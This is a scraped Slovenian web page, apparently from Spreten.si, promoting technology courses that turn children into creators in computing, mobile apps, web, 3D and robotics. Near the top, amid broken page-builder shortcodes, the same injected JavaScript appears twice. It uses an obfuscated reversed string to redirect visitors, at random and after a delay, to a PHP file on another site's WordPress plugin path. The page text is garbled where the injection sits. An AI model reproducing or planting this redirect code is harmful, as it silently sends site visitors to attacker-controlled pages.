Select Page
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” make_equal=”off” use_custom_gutter=”off” fullwidth=”off” specialty=”off” admin_label=”section” disabled=”off”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” use_custom_gutter=”off” gutter_width=”3″ padding_mobile=”off” allow_player_pause=”off” parallax=”off” parallax_method=”on” make_equal=”off” column_padding_mobile=”on” parallax_1=”off” parallax_method_1=”on” parallax_2=”off” parallax_method_2=”on” parallax_3=”off” parallax_method_3=”on” parallax_4=”off” parallax_method_4=”on” admin_label=”row” disabled=”off”]

Tehnologije so orodje


Pomena in pohoda novih tehnologij ne moremo ustaviti, kot ljudje v preteklih stoletjih niso mogli ustaviti parnega stroja, elektrike in radia, ki je zamenjal časopise. Lahko pa pri otrocih razvijamo način razmišljanja, ki bo tehnologijo razumel kot delovno orodje in jih motiviral k čemu več, kot je igranje računalniških igric in gledanje televizije. V Spreten.si pasivne uporabnike spreminjamo v aktivne ustvarjalce novih tehnologij.

V središču tehnologij je že desetletja računalnik in bo na tem mestu tudi ostal. Pred leti so se mu kot najhitreje razvijajoča se tehnolgija pridružile pametne mobilne naprave – majhni, zelo priročni računalniki z omejenimi možnostmi tehnološkega ustvarjanja. V Spreten.si povezujemo računalniško ustvarjalnost z uporabnimi funkcijami mobilnih naprav.

Tehnološki razvoj se za uporabnika dogaja na dveh frontah: mobilne aplikacije (Apple) in spletne rešitve (Google). V očeh ustvarjalcev pa sta zanimiva še dva svetova: 3D in robotika. V Spreten.si združujemo vsa ta znanja, ki otrokom omogočajo ustvarjanje tehnologij prihodnosti.